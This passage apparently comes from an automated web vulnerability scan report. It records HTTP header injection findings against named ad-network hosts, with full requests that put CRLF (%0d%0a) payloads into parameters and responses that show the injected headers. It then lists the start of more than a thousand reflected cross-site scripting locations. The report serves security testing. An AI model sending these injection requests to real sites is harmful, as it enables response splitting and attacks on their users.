pjw=BBQAAAACIAMDClZDTSAGAQABIAMCYEUEYBMC/fcHIA2AEwEeVOABHwBfoB8A/OACHwEpU+ABHwLmLwRgRwFfzeABPwE7UeABHwRORwQAAyBXAej74AEfAUVQ4AEfBDzSAwAEIB8B+hHgAR8BbkzgAR8BLjeAXwEq3uABHwF4S+ABHwBQIJ9AxwDX4AKfAX9K4AEfAYdBgB8B9fDgAT8BlEjgAR8BWEOAHwGa9eABHwGoRuABHwFSOYAfATz54AEfARxt4AEfAiTpA2E/AMegXwAGIMsBU2jgAR8A7aEfAF2hH0AfAVxn4AEfAFegvwDUoL9AHwGaYeABHwBfoJ8AmKCfQB8BpmDgAR8AbKCfAEugn0AfAc9c4AEfAS8sgL8BS8WAv0AfAdpb4AEfAJGhHwHu8uABHwEIV+ABHwEyRIG/AFLgAn8AOuEC3wHGLoBfAXHM4AE/4QOfASk/gB8BDu3AHwEAAA==;

Response

HTTP/1.1 302 Redirect
Date: Sat, 29 Jan 2011 05:01:39 GMT
Location: http://clk.pointroll.com/bc/?a=1362053&c=61d82
c94b6440ba8&i=EF9A0400-9CDB-6D58-1308-AD40023D0100&clickurl=http: //ad.doubleclick.net/jump/N5664.134236.VALUECLICK/B4607923.9;sz=1x1;ord=0.33574254042468965
P3P: CP='NOI DSP DEVo TAIo COR PSA OUR IND NAV'
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Type: text/plain
Content-Length: 0
Set-Cookie: srb=BAUAAAABIAMD+J5DTSAGYAsCUjkEIAmAC0AbYAAAn+ABHwI80gNgEgAFIAXAHwAf4AIfAVhD4Ak/ADHgAh8Bh0HgCR8BPnLgAV8BLyzgAR8ABiBjAwAAAAA=; domain=.fastclick.net; path=/; expires=Mon, 31-Jan-2011 05:01:39 GMT
Set-Cookie: oatmeal=10070:256698:477674:54816:0:1295977917:3|10249:250428:463354:54393:0:1296277299:0|; domain=.fastclick.net; path=/; expires=Mon, 28-Feb-2011 05:01:39 GMT
Set-Cookie: adv_ic=ByAAAAAzn0NNIAYJAAFDAADhWQAAHyALQAABQXegFwRJAAC2USAfQBQgAAHwceABFwH6XeABFwAx4AJHBAJbAAAaICtAAABk4AIvAate4A0vAGggFwACQCwgAABh4AIvAZlQ4AEvADDgAl8AsCAvAAMgK0AAAFjgAi9AR8CnAT5yoKcg1wH8SOABFwBW4AIvAOQg28AvAh6zQOEABwCpIC8AYEBcIAAAUOACLwSLXAAABCATQAACvQ0/4AAvABshNwB2QBQgAABN4AIvANUgL8DXAEvgAhcB21fgAXcASuACFwAa4AKPAEHgAhcAPyDvwKcAIOACFwB5IWfAFwAd4AIXAMXgAi8AGOACF0E3wC/gAxcBZTjgARcBXNWhByCLAGTgAhcAi8DvIBcBzU/hAX8AVeACFwFHU+ABRwAm4AIXAA/gAo8AA+ACFwAY4AIXAf4MoU8gXwG3WuABRwDc4AIXAMbgAhcA2OACFwAo4AJHAMTgAhcAFeACFwCr4AIXAXlHwF8BAAA=; domain=.fastclick.net; path=/; expires=Sun, 29-Jan-2012 05:01:39 GMT
Set-Cookie: pluto=517004695355|v1; domain=.fastclick.net; path=/; expires=Mon, 28-Jan-2013 05:01:39 GMT
Keep-Alive: timeout=5, max=19943
Connection: Keep-Alive

3.138. http://media.fastclick.net/w/click.here [cid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://media.fastclick.net
Path:	/w/click.here

Issue detail

The value of the cid request parameter is copied into the Location response header. The payload 9c6ba%0d%0ae8afb02647e was submitted in the cid parameter. This caused a response containing an injected HTTP header.

Request

GET /w/click.here?cid=250428;mid=463354;m=1;sid=54393;c=0;tp=5;forced_click=http://clk.pointroll.com/bc/?a=13620539c6ba%0d%0ae8afb02647e&c=1&i=EF9A0400-9CDB-6D58-1308-AD40023D0100&clickurl=http://ad.doubleclick.net/jump/N5664.134236.VALUECLICK/B4607923.9%3Bsz=1x1%3Bord=0.33574254042468965 HTTP/1.1
Host: media.fastclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lxc=AgAAAASMFi1NACAABHVydDE3IAfgBAADMwAAluAUHwEAAA==; lyc=BQAAAARmvzBNACAAARhFIASgAAaUMwAANhwpYBcBvUSgFCAABA49AAAZ4AoXQAABiw7gCS8ADSAvwAABaVrACSAAAksAAA==; zru=1|:1294800534|; adv_ic=BxQAAAAcbUNNIAYGAAFJAACZUCAHIAtAAAIes0CAFwdDAACpSAAAYEAUIAABU2jgAS8BP17gAS8CvQ0/4AAvBBtZAAB2ICtAAAFcZ+ABLwDF4AIvAZph4AEXALDgAhcBpmDgARcBAlvgAV8B0FzgARcA/CCPwKcBCFfgARcAviBHAANAdCAAAXhL4AEXAHngAkcBXNWg1yDvAWQ44AFHAIvAvyAXAc1P4AFHAFXgAhcBR1PgAS8AJuACFwAPIHfAjwAD4AIXABjgAhcB/gyhHyBfAbda4AEvANzgAhcAxuACFwDY4AIXACjgAkcA0+ACFwHVXOABRwCr4AIXAXlHwBcBAAA=; vt=10070:256698:477674:54816:0:1295925050:3|10991:274413:511325:54393:0:1296263251:0|; pluto=517004695355|v1; pjw=BBQAAAACIAMDClZDTSAGAQABIAMCYEUEYBMC/fcHIA2AEwEeVOABHwBfoB8A/OACHwEpU+ABHwLmLwRgRwFfzeABPwE7UeABHwRORwQAAyBXAej74AEfAUVQ4AEfBDzSAwAEIB8B+hHgAR8BbkzgAR8BLjeAXwEq3uABHwF4S+ABHwBQIJ9AxwDX4AKfAX9K4AEfAYdBgB8B9fDgAT8BlEjgAR8BWEOAHwGa9eABHwGoRuABHwFSOYAfATz54AEfARxt4AEfAiTpA2E/AMegXwAGIMsBU2jgAR8A7aEfAF2hH0AfAVxn4AEfAFegvwDUoL9AHwGaYeABHwBfoJ8AmKCfQB8BpmDgAR8AbKCfAEugn0AfAc9c4AEfAS8sgL8BS8WAv0AfAdpb4AEfAJGhHwHu8uABHwEIV+ABHwEyRIG/AFLgAn8AOuEC3wHGLoBfAXHM4AE/4QOfASk/gB8BDu3AHwEAAA==;

Response

HTTP/1.1 302 Redirect
Date: Sat, 29 Jan 2011 05:01:21 GMT
Location: http://clk.pointroll.com/bc/?a=13620539c6ba
e8afb02647e&c=1&i=EF9A0400-9CDB-6D58-1308-AD40023D0100&clickurl=http: //ad.doubleclick.net/jump/N5664.134236.VALUECLICK/B4607923.9;sz=1x1;ord=0.33574254042468965
P3P: CP='NOI DSP DEVo TAIo COR PSA OUR IND NAV'
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Type: text/plain
Content-Length: 0
Set-Cookie: srb=BAQAAAABIAMD+J5DTSAGYAsCUjkEIAmAC0AbYAAAn+ABHwI80gNgEgAFIAXAHwAf4AIfAVhD4Ak/AT5y4AE/AS8s4AEfAAYgQwMAAAAA; domain=.fastclick.net; path=/; expires=Mon, 31-Jan-2011 05:01:21 GMT
Set-Cookie: oatmeal=10070:256698:477674:54816:0:1295977917:3|10249:250428:463354:54393:0:1296277281:0|; domain=.fastclick.net; path=/; expires=Mon, 28-Feb-2011 05:01:21 GMT
Set-Cookie: adv_ic=ByAAAAAhn0NNIAYJAAFDAADhWQAAGiALQAABQXegFwRJAAC2USAfQBQgAAHwceABFwH6XeABFwAf4AJHBLBeAAACICtAAABk4AIvAKsgF8BHABvgAi8EAlsAABhALCAAAGHgAi8BmVDgAS8BPnKgdyCnAfxI4AEXAFjgAi8AaOACX+ADL+ADFwBW4AIvAOQg28CPAh6zQOEABwCpIF8AYCCLQAAAUOACLwSLXAAABEAUIAACvQ0/4AAvABshNwB2IBNAAABN4AIvANUgL8EHAEvgAhcB21fgAXcASuACFwAa4AKPAEHgAhcAP+AC1wAg4AIXAHkhN8C/AB3gAhcAxeACLwAY4AIXQZfAL+ADFwFlOOABFwFc1aEHIIsAZOACFwCLwO8gFwTNTwAAA0DsIAAAVeACFwFHU+ABRwAm4AIXAA/gAo8AA+ACFwAY4AIXAf4MoU8gXwG3WuABRwDc4AIXAMbgAhcA2OACFwAo4AJHAMTgAhcAFeACFwCr4AIXAXlHwF8BAAA=; domain=.fastclick.net; path=/; expires=Sun, 29-Jan-2012 05:01:21 GMT
Set-Cookie: pluto=517004695355|v1; domain=.fastclick.net; path=/; expires=Mon, 28-Jan-2013 05:01:21 GMT
Keep-Alive: timeout=5, max=19999
Connection: Keep-Alive

3.139. http://media.fastclick.net/w/click.here [i parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://media.fastclick.net
Path:	/w/click.here

Issue detail

The value of the i request parameter is copied into the Location response header. The payload 580bf%0d%0a0247a4016c9 was submitted in the i parameter. This caused a response containing an injected HTTP header.

Request

GET /w/click.here?cid=250428;mid=463354;m=1;sid=54393;c=0;tp=5;forced_click=http://clk.pointroll.com/bc/?a=1362053&c=1&i=580bf%0d%0a0247a4016c9&clickurl=http://ad.doubleclick.net/jump/N5664.134236.VALUECLICK/B4607923.9%3Bsz=1x1%3Bord=0.33574254042468965 HTTP/1.1
Host: media.fastclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lxc=AgAAAASMFi1NACAABHVydDE3IAfgBAADMwAAluAUHwEAAA==; lyc=BQAAAARmvzBNACAAARhFIASgAAaUMwAANhwpYBcBvUSgFCAABA49AAAZ4AoXQAABiw7gCS8ADSAvwAABaVrACSAAAksAAA==; zru=1|:1294800534|; adv_ic=BxQAAAAcbUNNIAYGAAFJAACZUCAHIAtAAAIes0CAFwdDAACpSAAAYEAUIAABU2jgAS8BP17gAS8CvQ0/4AAvBBtZAAB2ICtAAAFcZ+ABLwDF4AIvAZph4AEXALDgAhcBpmDgARcBAlvgAV8B0FzgARcA/CCPwKcBCFfgARcAviBHAANAdCAAAXhL4AEXAHngAkcBXNWg1yDvAWQ44AFHAIvAvyAXAc1P4AFHAFXgAhcBR1PgAS8AJuACFwAPIHfAjwAD4AIXABjgAhcB/gyhHyBfAbda4AEvANzgAhcAxuACFwDY4AIXACjgAkcA0+ACFwHVXOABRwCr4AIXAXlHwBcBAAA=; vt=10070:256698:477674:54816:0:1295925050:3|10991:274413:511325:54393:0:1296263251:0|; pluto=517004695355|v1; pjw=BBQAAAACIAMDClZDTSAGAQABIAMCYEUEYBMC/fcHIA2AEwEeVOABHwBfoB8A/OACHwEpU+ABHwLmLwRgRwFfzeABPwE7UeABHwRORwQAAyBXAej74AEfAUVQ4AEfBDzSAwAEIB8B+hHgAR8BbkzgAR8BLjeAXwEq3uABHwF4S+ABHwBQIJ9AxwDX4AKfAX9K4AEfAYdBgB8B9fDgAT8BlEjgAR8BWEOAHwGa9eABHwGoRuABHwFSOYAfATz54AEfARxt4AEfAiTpA2E/AMegXwAGIMsBU2jgAR8A7aEfAF2hH0AfAVxn4AEfAFegvwDUoL9AHwGaYeABHwBfoJ8AmKCfQB8BpmDgAR8AbKCfAEugn0AfAc9c4AEfAS8sgL8BS8WAv0AfAdpb4AEfAJGhHwHu8uABHwEIV+ABHwEyRIG/AFLgAn8AOuEC3wHGLoBfAXHM4AE/4QOfASk/gB8BDu3AHwEAAA==;

Response

HTTP/1.1 302 Redirect
Date: Sat, 29 Jan 2011 05:01:42 GMT
Location: http://clk.pointroll.com/bc/?a=1362053&c=1&i=580bf
0247a4016c9&clickurl=http: //ad.doubleclick.net/jump/N5664.134236.VALUECLICK/B4607923.9;sz=1x1;ord=0.33574254042468965
P3P: CP='NOI DSP DEVo TAIo COR PSA OUR IND NAV'
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Type: text/plain
Content-Length: 0
Set-Cookie: srb=BAUAAAABIAMD+J5DTSAGYAsCUjkEIAmAC0AbYAAAn+ABHwI80gNgEgAFIAXAHwAf4AIfAVhD4Ak/ADHgAh8Bh0HgCR8ANuACHwEvLOABHwAGIGMDAAAAAA==; domain=.fastclick.net; path=/; expires=Mon, 31-Jan-2011 05:01:42 GMT
Set-Cookie: oatmeal=10070:256698:477674:54816:0:1295977917:3|10249:250428:463354:54393:0:1296277302:0|; domain=.fastclick.net; path=/; expires=Mon, 28-Feb-2011 05:01:42 GMT
Set-Cookie: adv_ic=ByAAAAA2n0NNIAYJAAFDAADhWQAAIyALQAABQXegFwRJAAC2USAfQBQgAOADLwQCWwAAHCATQAAB8HHgAS8B+l3gDS8E/EgAAANALCAAAGTgAi8Bq17gAS8AYeACFwGZUOABFwA14AKnALAgLwAFIENAAABY4AIvAGggF8CnADHgAi9AFwACQCwgAABW4AIvAOQg28AvAh6zQOEABwCpIKcAYCArQAAAUOACLwSLXAAABEAUIAACvQ0/4AAvABshNwB2IBNAAABN4AIvANUgL8B3AEvgAhcB21fgAXcASuACFwAa4AKPAEHgAhcAP+AC1wAg4AIXAHkhf8C/AB3gAhcAxeACLwAY4AIXQTfAL+ADFwFlOOABFwFc1aEHIIsAZOACFwCLwO8gFwHNT+EBxwBV4AIXAUdT4AFHACbgAhcAD+ACjwAD4AIXABjgAhcB/gyhTyBfAbda4AFHANzgAhcAxuACFwDY4AIXACjgAkcAxOACFwAV4AIXAKvgAhcBeUfAXwEAAA==; domain=.fastclick.net; path=/; expires=Sun, 29-Jan-2012 05:01:42 GMT
Set-Cookie: pluto=517004695355|v1; domain=.fastclick.net; path=/; expires=Mon, 28-Jan-2013 05:01:42 GMT
Keep-Alive: timeout=5, max=19968
Connection: Keep-Alive

3.140. http://na.link.decdna.net/n/49881/49889/www.247realmedia.com/1ykg1it [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://na.link.decdna.net
Path:	/n/49881/49889/www.247realmedia.com/1ykg1it

Issue detail

The value of REST URL parameter 2 is copied into the location response header. The payload bae3a%0d%0a8cac8fd9833 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /n/bae3a%0d%0a8cac8fd9833/49889/www.247realmedia.com/1ykg1it;11;3;;6;;8rue07;;;;;1;/i/c?0&pq=%2fEN%2dUS%2f&1pixgif&referer= HTTP/1.1
Host: na.link.decdna.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Fri, 28 Jan 2011 14:16:11 GMT
Server: Apache/1.3.33 (Unix)
Pragma: no-cache
Expires: Fri, 28 Jan 2011 14:16:11 GMT
location: http://na.link.decdna.net/n/bae3a
8cac8fd9833/49889/www.247realmedia.com/1ykg1it;11;3;;6;;8rue07;;;;;1;/i/c?0&pq=%2fEN%2dUS%2f&1pixgif&referer=?0&0&pq=%2fEN%2dUS%2f&1pixgif&referer=&bounced
Set-Cookie: %2edecdna%2enet/%2fn%2f0/2/e=1296224171/0/49889/0/0//0///0/0/0/0///0/0//0//0/0; expires=Sun, 27-Feb-2011 14:16:11 GMT; path=/n/0; domain=.decdna.net;
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS COM NAV INT"
Set-Cookie: id=9286424862321017538; expires=Sat, 28-Jan-2012 14:16:11 GMT; path=/; domain=.decdna.net;
Set-Cookie: name=9286424862086137007; path=/; domain=.decdna.net;
Content-Length: 0
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

3.141. http://na.link.decdna.net/n/49881/49889/www.247realmedia.com/1ykg1it [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://na.link.decdna.net
Path:	/n/49881/49889/www.247realmedia.com/1ykg1it

Issue detail

The value of REST URL parameter 4 is copied into the location response header. The payload d157e%0d%0a9e710a277af was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /n/49881/49889/d157e%0d%0a9e710a277af/1ykg1it;11;3;;6;;8rue07;;;;;1;/i/c?0&pq=%2fEN%2dUS%2f&1pixgif&referer= HTTP/1.1
Host: na.link.decdna.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Fri, 28 Jan 2011 14:16:12 GMT
Server: Apache/1.3.33 (Unix)
Pragma: no-cache
Expires: Fri, 28 Jan 2011 14:16:12 GMT
location: http://na.link.decdna.net/n/49881/49889/d157e
9e710a277af/1ykg1it;11;3;;6;;8rue07;;;;;1;/i/c?0&0&pq=%2fEN%2dUS%2f&1pixgif&referer=&bounced
Set-Cookie: %2edecdna%2enet/%2fn%2f49881/2/e=1296224172/49881/49889/0/0//0///0/0/0/0///0/0//0//0/0; expires=Sun, 27-Feb-2011 14:16:12 GMT; path=/n/49881; domain=.decdna.net;
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS COM NAV INT"
Set-Cookie: id=9286424825394364597; expires=Sat, 28-Jan-2012 14:16:12 GMT; path=/; domain=.decdna.net;
Set-Cookie: name=9286424825327255845; path=/; domain=.decdna.net;
Content-Length: 0
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

3.142. http://na.link.decdna.net/n/49881/49889/www.247realmedia.com/1ykg1it [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://na.link.decdna.net
Path:	/n/49881/49889/www.247realmedia.com/1ykg1it

Issue detail

The value of REST URL parameter 5 is copied into the location response header. The payload 4f471%0d%0a5d3c9c04556 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /n/49881/49889/www.247realmedia.com/4f471%0d%0a5d3c9c04556;11;3;;6;;8rue07;;;;;1;/i/c?0&pq=%2fEN%2dUS%2f&1pixgif&referer= HTTP/1.1
Host: na.link.decdna.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Fri, 28 Jan 2011 14:16:13 GMT
Server: Apache/1.3.33 (Unix)
Pragma: no-cache
Expires: Fri, 28 Jan 2011 14:16:13 GMT
location: http://dna1.mookie1.com/n/49881/49889/www.247realmedia.com/4f471
5d3c9c04556;11;3;;6;;8rue07;;;;;1;/i/c?0&0&pq=%2fEN%2dUS%2f&1pixgif&referer=&redirected
Content-Length: 0
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

3.143. http://xads.zedo.com/ads2/c [a parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://xads.zedo.com
Path:	/ads2/c

Issue detail

The value of the a request parameter is copied into the Location response header. The payload 166b6%0d%0a77cb3dde500 was submitted in the a parameter. This caused a response containing an injected HTTP header.

Request

GET /ads2/c?a=853584;x=2304;g=172;c=1220000101,1220000101;i=0;n=1220;1=8;2=1;s=69;g=172;m=82;w=47;i=0;u=INmz6woBADYAAHrQ5V4AAACH~010411;p=6;f=990638;h=922865;k=http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/166b6%0d%0a77cb3dde500 HTTP/1.1
Host: xads.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Fri, 28 Jan 2011 15:06:34 GMT
Server: ZEDO 3G
Set-Cookie: FFgeo=5386156; path=/; EXPIRES=Sat, 28-Jan-12 15:06:34 GMT; DOMAIN=.zedo.com
Set-Cookie: ZFFbh=826-20110128,20|305_1;expires=Sat, 28 Jan 2012 15:06:34 GMT;DOMAIN=.zedo.com;path=/;
Set-Cookie: PCA922865=a853584Zc1220000101%2C1220000101Zs69Zi0Zt128; path=/; EXPIRES=Sun, 27-Feb-11 15:06:34 GMT; DOMAIN=.zedo.com
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Location: http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/166b6
77cb3dde500
Vary: Accept-Encoding
Content-Length: 420
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://hpi.rotator.hadj7.adjuggler.net/servlet/
...[SNIP]...

3.144. http://xads.zedo.com/ads2/c [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://xads.zedo.com
Path:	/ads2/c

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 958c6%0d%0a12c64e7ba41 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /ads2/c?a=853584;x=2304;g=172;c=1220000101,1220000101;i=0;n=1220;1=8;2=1;s=69;g=172;m=82;w=47;i=0;u=INmz6woBADYAAHrQ5V4AAACH~010411;p=6;f=990638;h=922865;k=http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/&958c6%0d%0a12c64e7ba41=1 HTTP/1.1
Host: xads.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Fri, 28 Jan 2011 15:06:36 GMT
Server: ZEDO 3G
Set-Cookie: FFgeo=5386156; path=/; EXPIRES=Sat, 28-Jan-12 15:06:36 GMT; DOMAIN=.zedo.com
Set-Cookie: ZFFbh=826-20110128,20|305_1;expires=Sat, 28 Jan 2012 15:06:36 GMT;DOMAIN=.zedo.com;path=/;
Set-Cookie: PCA922865=a853584Zc1220000101%2C1220000101Zs69Zi0Zt128; path=/; EXPIRES=Sun, 27-Feb-11 15:06:36 GMT; DOMAIN=.zedo.com
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Location: http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/&958c6
12c64e7ba41=1
Vary: Accept-Encoding
Content-Length: 427
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://hpi.rotator.hadj7.adjuggler.net/servlet/
...[SNIP]...

4. Cross-site scripting (reflected) previous next
There are 1047 instances of this issue:

http://a.collective-media.net/ad/cm.quadbostonherald/ [REST URL parameter 1]
http://a.collective-media.net/ad/q1.bosherald/be_ent [REST URL parameter 1]
http://a.collective-media.net/ad/q1.bosherald/be_ent [REST URL parameter 1]
http://a.collective-media.net/ad/q1.bosherald/be_ent_fr [REST URL parameter 1]
http://a.collective-media.net/ad/q1.bosherald/be_ent_fr [REST URL parameter 1]
http://a.collective-media.net/ad/q1.bosherald/ent [REST URL parameter 1]
http://a.collective-media.net/ad/q1.bosherald/ent [REST URL parameter 1]
http://a.collective-media.net/ad/q1.bosherald/ent_fr [REST URL parameter 1]
http://a.collective-media.net/ad/q1.bosherald/ent_fr [REST URL parameter 1]
http://a.collective-media.net/ad/uol.collective/ColeHaan_MM_Openness_CMN_13109 [REST URL parameter 1]
http://a.collective-media.net/adj/bzo.847.CD39C435/ATF [REST URL parameter 2]
http://a.collective-media.net/adj/bzo.847.CD39C435/ATF [REST URL parameter 3]
http://a.collective-media.net/adj/bzo.847.CD39C435/ATF [name of an arbitrarily supplied request parameter]
http://a.collective-media.net/adj/bzo.847.CD39C435/ATF [sz parameter]
http://a.collective-media.net/adj/cm.quadbostonherald/ [REST URL parameter 2]
http://a.collective-media.net/adj/cm.quadbostonherald/ [name of an arbitrarily supplied request parameter]
http://a.collective-media.net/adj/cm.quadbostonherald/ [sz parameter]
http://a.collective-media.net/adj/cm.rev_bostonherald/ [REST URL parameter 2]
http://a.collective-media.net/adj/cm.rev_bostonherald/ [name of an arbitrarily supplied request parameter]
http://a.collective-media.net/adj/cm.rev_bostonherald/ [sz parameter]
http://a.collective-media.net/adj/iblocal.revinet.bostonherald/audience [REST URL parameter 2]
http://a.collective-media.net/adj/iblocal.revinet.bostonherald/audience [REST URL parameter 3]
http://a.collective-media.net/adj/iblocal.revinet.bostonherald/audience [name of an arbitrarily supplied request parameter]
http://a.collective-media.net/adj/iblocal.revinet.bostonherald/audience [sz parameter]
http://a.collective-media.net/adj/q1.bosherald/be_ent [REST URL parameter 2]
http://a.collective-media.net/adj/q1.bosherald/be_ent [REST URL parameter 3]
http://a.collective-media.net/adj/q1.bosherald/be_ent [name of an arbitrarily supplied request parameter]
http://a.collective-media.net/adj/q1.bosherald/be_ent [sz parameter]
http://a.collective-media.net/adj/q1.bosherald/be_ent_fr [REST URL parameter 2]
http://a.collective-media.net/adj/q1.bosherald/be_ent_fr [REST URL parameter 3]
http://a.collective-media.net/adj/q1.bosherald/be_ent_fr [name of an arbitrarily supplied request parameter]
http://a.collective-media.net/adj/q1.bosherald/be_ent_fr [sz parameter]
http://a.collective-media.net/adj/q1.bosherald/ent [REST URL parameter 2]
http://a.collective-media.net/adj/q1.bosherald/ent [REST URL parameter 3]
http://a.collective-media.net/adj/q1.bosherald/ent [name of an arbitrarily supplied request parameter]
http://a.collective-media.net/adj/q1.bosherald/ent [sz parameter]
http://a.collective-media.net/adj/q1.bosherald/ent_fr [REST URL parameter 2]
http://a.collective-media.net/adj/q1.bosherald/ent_fr [REST URL parameter 3]
http://a.collective-media.net/adj/q1.bosherald/ent_fr [name of an arbitrarily supplied request parameter]
http://a.collective-media.net/adj/q1.bosherald/ent_fr [sz parameter]
http://a.collective-media.net/adj/uol.collective/ColeHaan_MM_Openness_CMN_13109 [REST URL parameter 2]
http://a.collective-media.net/adj/uol.collective/ColeHaan_MM_Openness_CMN_13109 [REST URL parameter 3]
http://a.collective-media.net/adj/uol.collective/ColeHaan_MM_Openness_CMN_13109 [dcove parameter]
http://a.collective-media.net/adj/uol.collective/ColeHaan_MM_Openness_CMN_13109 [name of an arbitrarily supplied request parameter]
http://a.collective-media.net/cmadj/bzo.847.CD39C435/ATF [REST URL parameter 1]
http://a.collective-media.net/cmadj/bzo.847.CD39C435/ATF [REST URL parameter 2]
http://a.collective-media.net/cmadj/bzo.847.CD39C435/ATF [REST URL parameter 3]
http://a.collective-media.net/cmadj/bzo.847.CD39C435/ATF [name of an arbitrarily supplied request parameter]
http://a.collective-media.net/cmadj/bzo.847.CD39C435/ATF [sz parameter]
http://a.collective-media.net/cmadj/iblocal.revinet.bostonherald/audience [REST URL parameter 1]
http://a.collective-media.net/cmadj/iblocal.revinet.bostonherald/audience [REST URL parameter 2]
http://a.collective-media.net/cmadj/iblocal.revinet.bostonherald/audience [REST URL parameter 3]
http://a.collective-media.net/cmadj/iblocal.revinet.bostonherald/audience [name of an arbitrarily supplied request parameter]
http://a.collective-media.net/cmadj/iblocal.revinet.bostonherald/audience [sz parameter]
http://a.collective-media.net/cmadj/q1.bosherald/be_ent [REST URL parameter 1]
http://a.collective-media.net/cmadj/q1.bosherald/be_ent [REST URL parameter 2]
http://a.collective-media.net/cmadj/q1.bosherald/be_ent [REST URL parameter 3]
http://a.collective-media.net/cmadj/q1.bosherald/be_ent [name of an arbitrarily supplied request parameter]
http://a.collective-media.net/cmadj/q1.bosherald/be_ent [sz parameter]
http://a.collective-media.net/cmadj/q1.bosherald/be_ent_fr [REST URL parameter 1]
http://a.collective-media.net/cmadj/q1.bosherald/be_ent_fr [REST URL parameter 2]
http://a.collective-media.net/cmadj/q1.bosherald/be_ent_fr [REST URL parameter 3]
http://a.collective-media.net/cmadj/q1.bosherald/be_ent_fr [name of an arbitrarily supplied request parameter]
http://a.collective-media.net/cmadj/q1.bosherald/be_ent_fr [sz parameter]
http://a.collective-media.net/cmadj/q1.bosherald/ent [REST URL parameter 1]
http://a.collective-media.net/cmadj/q1.bosherald/ent [REST URL parameter 2]
http://a.collective-media.net/cmadj/q1.bosherald/ent [REST URL parameter 3]
http://a.collective-media.net/cmadj/q1.bosherald/ent [name of an arbitrarily supplied request parameter]
http://a.collective-media.net/cmadj/q1.bosherald/ent [sz parameter]
http://a.collective-media.net/cmadj/q1.bosherald/ent_fr [REST URL parameter 1]
http://a.collective-media.net/cmadj/q1.bosherald/ent_fr [REST URL parameter 2]
http://a.collective-media.net/cmadj/q1.bosherald/ent_fr [REST URL parameter 3]
http://a.collective-media.net/cmadj/q1.bosherald/ent_fr [name of an arbitrarily supplied request parameter]
http://a.collective-media.net/cmadj/q1.bosherald/ent_fr [sz parameter]
http://a.collective-media.net/cmadj/uol.collective/ColeHaan_MM_Openness_CMN_13109 [REST URL parameter 1]
http://a.collective-media.net/cmadj/uol.collective/ColeHaan_MM_Openness_CMN_13109 [REST URL parameter 2]
http://a.collective-media.net/cmadj/uol.collective/ColeHaan_MM_Openness_CMN_13109 [REST URL parameter 3]
http://a.collective-media.net/cmadj/uol.collective/ColeHaan_MM_Openness_CMN_13109 [dcove parameter]
http://a.collective-media.net/cmadj/uol.collective/ColeHaan_MM_Openness_CMN_13109 [name of an arbitrarily supplied request parameter]
http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.7 [c parameter]
http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.7 [c parameter]
http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.7 [forced_click parameter]
